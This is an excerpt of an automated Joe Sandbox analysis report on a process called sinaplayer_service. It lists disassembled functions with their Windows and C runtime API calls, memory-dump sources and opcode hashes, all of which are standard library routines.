                                                                                                                                                                                                    • API ID: Concurrency::details::Exception$??0exception@std@@??2@?wait@event@Base::Concurrency::location::operator==Concurrency@@ContextCreateH_prolog3_catchPushQueueRaiseStack::TaskThrowValueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3358135389-0
                                                                                                                                                                                                    • Opcode ID: f575510cac42a8851ce6865ee36d97d5c90249b842e007eb414b4cae3af1b8bc
                                                                                                                                                                                                    • Instruction ID: 5adea63525db6715c2656ad74ac976403faf429981881c82f268320e2f332179
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f575510cac42a8851ce6865ee36d97d5c90249b842e007eb414b4cae3af1b8bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2217C71A00B05EBCB00DFA5CC90AEDFBB2FF84224B10892ED459A7F10DB359915DB52
                                                                                                                                                                                                    Function 6C5C8AE6 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6C5C8AED
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000014), ref: 6C5C8AFF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,?,?,?,?,?,?,?,6C62D0DC,00000014), ref: 6C5C8B14
                                                                                                                                                                                                      • Part of subcall function 6C5692EB: RaiseException.KERNEL32(?,?,?,6C57C7FC,?,?,?,?,?,6C5ADA6A,?,6C57C7FC,?,00000001), ref: 6C569333
                                                                                                                                                                                                      • Part of subcall function 6C5C887D: ?wait@event@Concurrency@@QAEII@Z.MSVCR120(000000FF,00000000,6C5C8AB2,?,?,?,00000014), ref: 6C5C8895
                                                                                                                                                                                                      • Part of subcall function 6C573AF4: TlsGetValue.KERNEL32(6C573DF7,00000000,00000000,?,?,?,?,?,?,?,6C564938,000000FF), ref: 6C573AFA
                                                                                                                                                                                                      • Part of subcall function 6C5B9FA4: Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6C5B9FB2
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,?,?,?,00000014), ref: 6C5C8B4D
                                                                                                                                                                                                    • Concurrency::details::TaskStack::Push.LIBCMT ref: 6C5C8B84
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::Exception$??0exception@std@@??2@?wait@event@Base::Concurrency@@ContextCreateH_prolog3_catchPushQueueRaiseStack::TaskThrowValueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3410968691-0
                                                                                                                                                                                                    • Opcode ID: 1c137105fba1e06c2089281cc31b6e169e7d251e484f2ccbf134ae73bd82d181
                                                                                                                                                                                                    • Instruction ID: ee2c9dea29b228049e948bd2b75e1c3214a31b28788a91097e4433ef86ae546c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c137105fba1e06c2089281cc31b6e169e7d251e484f2ccbf134ae73bd82d181
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8219DB1A00A05DFCB04DFB5CC916ADFBF1BF98218B10892ED556A7F50DB34A815CB52
                                                                                                                                                                                                    Function 6C58287F Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_localtime64_sasctime_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2556715357-0
                                                                                                                                                                                                    • Opcode ID: c11867e7abdee0d17adeceb03024eb736abb7e9fb3fb4b597248e474fe44f97d
                                                                                                                                                                                                    • Instruction ID: 84a70ad5d98c50ccb0ef9f3630830a37e26ac88910920f6160d4b0a7e874ffb0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c11867e7abdee0d17adeceb03024eb736abb7e9fb3fb4b597248e474fe44f97d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD119135907328DFDB158FAE9C04ADE7BA8AF0A318F40446BE504EBE50DB3489459B99
                                                                                                                                                                                                    Function 6C5C2E72 Relevance: 7.6, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6C5C2CC2,00000004,6C5C249A), ref: 6C5C2E7E
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6C5C2CC2,00000004,6C5C249A), ref: 6C5C2E96
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6C5C2CC2,00000004,6C5C249A), ref: 6C5C2EE0
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,6C5C2CC2,00000004,6C5C249A), ref: 6C5C2EE6
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6C5C2CC2,00000004,6C5C249A), ref: 6C5C2EF6
                                                                                                                                                                                                      • Part of subcall function 6C5BAF6F: free.MSVCR120(?,?,6C5BAF12), ref: 6C5BAF79
                                                                                                                                                                                                      • Part of subcall function 6C5BAF6F: free.MSVCR120(?,?,?,6C5BAF12), ref: 6C5BAF81
                                                                                                                                                                                                      • Part of subcall function 6C5BAF6F: free.MSVCR120(?,?,?,?,6C5BAF12), ref: 6C5BAF89
                                                                                                                                                                                                      • Part of subcall function 6C5BAF6F: free.MSVCR120(?,?,?,?,?,6C5BAF12), ref: 6C5BAF91
                                                                                                                                                                                                      • Part of subcall function 6C5BAF6F: free.MSVCR120(?,?,?,?,?,?,6C5BAF12), ref: 6C5BAF97
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$FlushInterlockedList
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1955102368-0
                                                                                                                                                                                                    • Opcode ID: 070f96e2091e8533b584914b6036c090e56dbdcfa8f332c6393fe2d8fe0ce228
                                                                                                                                                                                                    • Instruction ID: 3049d264655a7cd06e645933f0bcc731b186bd8663e4eb128adec0cb7d4b5791
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 070f96e2091e8533b584914b6036c090e56dbdcfa8f332c6393fe2d8fe0ce228
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F11A036A00621EBC726DF95CDD44A9B7A0BF883A43451A6DD98437F00DB30BC19CBE1
                                                                                                                                                                                                    Function 00398205 Relevance: 7.6, APIs: 5, Instructions: 58memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00380F37,?,00000000,00000000,?,?,?,?,?,00380F37), ref: 00398233
                                                                                                                                                                                                    • free.MSVCR120 ref: 00398246
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00380F37), ref: 0039824E
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00398267
                                                                                                                                                                                                    • free.MSVCR120 ref: 00398278
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$AllocByteCharErrorLastMultiStringWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2461177162-0
                                                                                                                                                                                                    • Opcode ID: 2157b8b9be582f0656d78bc476844b3fc68402cbe77989050dfa2fb9a7de5d4b
                                                                                                                                                                                                    • Instruction ID: a93b8746780b1d01c1a3888f511139e99d3db44ea3c4002d7ebd539dae935396
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2157b8b9be582f0656d78bc476844b3fc68402cbe77989050dfa2fb9a7de5d4b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A711E972A006189BDF12ABA4DC46B9F7768EF89320F000626F945FB251DB35A84086A5
                                                                                                                                                                                                    Function 6C5BC9DA Relevance: 7.6, APIs: 5, Instructions: 57threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?), ref: 6C5BCA00
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C5BCA35
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCMT ref: 6C5BCA48
                                                                                                                                                                                                      • Part of subcall function 6C5BEE8E: GetLastError.KERNEL32(?,?,?,6C5A30F2), ref: 6C5BEE94
                                                                                                                                                                                                      • Part of subcall function 6C5BEE8E: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,6C5A30F2), ref: 6C5BEEAA
                                                                                                                                                                                                      • Part of subcall function 6C5BEE8E: _CxxThrowException.MSVCR120(?,6C62CF40,00000000,?,?,?,6C5A30F2), ref: 6C5BEEB8
                                                                                                                                                                                                      • Part of subcall function 6C5BC9DA: List.LIBCMT ref: 6C5BCA67
                                                                                                                                                                                                      • Part of subcall function 6C5BC9DA: free.MSVCR120(?,?), ref: 6C5BCA73
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCoreCurrentDecrementErrorExceptionLastListProxy::SchedulerSubscriptionThreadThrowValuefree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3155433331-0
                                                                                                                                                                                                    • Opcode ID: 711de22382a1f127726ee1ba4591422404aff4d8adf825b697b82381d129ef38
                                                                                                                                                                                                    • Instruction ID: f2d5098bcfb8519ea459b22330cd280071e1bc71185983973329e9a436cad40c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 711de22382a1f127726ee1ba4591422404aff4d8adf825b697b82381d129ef38
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74119431240600DBC724EFA6DCA0AA677F5FF45354B040A1EE4D656EA0DB31BC589BA5
                                                                                                                                                                                                    Function 0037D5B0 Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120 ref: 0037D5D1
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120 ref: 0037D5DF
                                                                                                                                                                                                    • memmove.MSVCR120(00000000,?,?), ref: 0037D5F2
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120 ref: 0037D60D
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 0037D617
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@??3@D@std@@@std@@U?$char_traits@Unlock@?$basic_streambuf@Xbad_alloc@std@@memmove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1432024918-0
                                                                                                                                                                                                    • Opcode ID: 4127f295df487c13d9c39c07e29a41c7f02cd4d162cee8ffc49584ebf5881d79
                                                                                                                                                                                                    • Instruction ID: a0bad2d2e354c6cee853a13e7dd9c672d3cde64f059f320dabfebecaf122f225
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4127f295df487c13d9c39c07e29a41c7f02cd4d162cee8ffc49584ebf5881d79
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A01F5B1500606AFDB26DF69D88596AFBACFF05324B04823AED18C7350EB35E910CB91
                                                                                                                                                                                                    Function 00374CC0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(?), ref: 00374CD7
                                                                                                                                                                                                    • ?_Xbad_alloc@std@@YAXXZ.MSVCP120 ref: 00374CE5
                                                                                                                                                                                                    • memmove.MSVCR120(00000000,?,?), ref: 00374CF5
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00374D0D
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00374D17
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@??3@D@std@@@std@@U?$char_traits@Unlock@?$basic_streambuf@Xbad_alloc@std@@memmove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1432024918-0
                                                                                                                                                                                                    • Opcode ID: bf0c8617a9d5a194b668681be9fb309672c963f723d35ff523ddf49cfea4af5a
                                                                                                                                                                                                    • Instruction ID: dccda45aaece8223d40ee612e45d3301f55964154844c65c12c911587d2a9be6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf0c8617a9d5a194b668681be9fb309672c963f723d35ff523ddf49cfea4af5a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D01B1B56005126F9722DF69D88596ABB9CFF053207128236E909C3341EB35E810C7E1
                                                                                                                                                                                                    Function 003756A0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003756A7
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003756B9
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003756CE
                                                                                                                                                                                                    • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP120(000000FF), ref: 003756E3
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003756F0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?gbump@?$basic_streambuf@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2638700559-0
                                                                                                                                                                                                    • Opcode ID: a42574bae35dfe967ad0ec029a7a18d8d0234514859165ddc14722e1117c4ada
                                                                                                                                                                                                    • Instruction ID: 49493e9002d9a2bdb72de1582a7047bb9831e45a22e3e5c3b1035f16d65302b5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a42574bae35dfe967ad0ec029a7a18d8d0234514859165ddc14722e1117c4ada
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 210167323055485B963A573CACC852DF75AFB91334B658727E469871E0CB66DC128760
                                                                                                                                                                                                    Function 6C57CA08 Relevance: 7.5, APIs: 5, Instructions: 46memorythreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: EncodePointer.KERNEL32(00000000,?,6C57CA0D,6C57CA91,6C561A28,00000008,6C561A5F,?,00000001,?), ref: 6C57D411
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: __initp_misc_winsig.LIBCMT ref: 6C57D42C
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetModuleHandleW.KERNEL32(kernel32.dll,00000000), ref: 6C57D448
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6C57D45C
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6C57D46F
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6C57D482
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6C57D495
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 6C57D4A8
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 6C57D4BB
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 6C57D4CE
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6C57D4E1
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 6C57D4F4
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 6C57D507
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 6C57D51A
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 6C57D52D
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 6C57D540
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 6C57D553
                                                                                                                                                                                                      • Part of subcall function 6C57D40E: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 6C57D566
                                                                                                                                                                                                    • __crtFlsAlloc.MSVCR120(?,6C57CA91,6C561A28,00000008,6C561A5F,?,00000001,?), ref: 6C57CA1F
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,000003BC,?,6C57CA91,6C561A28,00000008,6C561A5F,?,00000001,?), ref: 6C57CA3B
                                                                                                                                                                                                    • __crtFlsSetValue.MSVCR120(00000000,?,6C57CA91,6C561A28,00000008,6C561A5F,?,00000001,?), ref: 6C57CA4F
                                                                                                                                                                                                    • _initptd.MSVCR120(00000000,00000000,6C57CA91,6C561A28,00000008,6C561A5F,?,00000001,?), ref: 6C57CA5D
                                                                                                                                                                                                      • Part of subcall function 6C561BFD: _lock.MSVCR120(0000000D), ref: 6C561C41
                                                                                                                                                                                                      • Part of subcall function 6C561BFD: _lock.MSVCR120(0000000C), ref: 6C561C62
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C57CA64
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$__crt_lock$AllocCurrentEncodeHandleModulePointerThreadValue__initp_misc_winsig_calloc_crt_initptd
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4031882113-0
                                                                                                                                                                                                    • Opcode ID: 8a95f5f34bcc83aaa1b4d3863924cf3f1e7834ec4ff35008a5e2879722af5bb7
                                                                                                                                                                                                    • Instruction ID: 462e891e49d92241238ad732f15a72587509fe24b92ff9e36f351ffd25c853ad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a95f5f34bcc83aaa1b4d3863924cf3f1e7834ec4ff35008a5e2879722af5bb7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F0F63360A711EDEB34B6B67C05B9B3694DB4267CF20061AE071D9EE0FF10D885C5A5
                                                                                                                                                                                                    Function 0038F990 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00390165,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 0038F99B
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(?,00000000,00390165,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 0038F9AA
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 0038F9B3
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,00000000,00390165,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 0038F9F3
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,00000000,00390165,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 0038FA05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
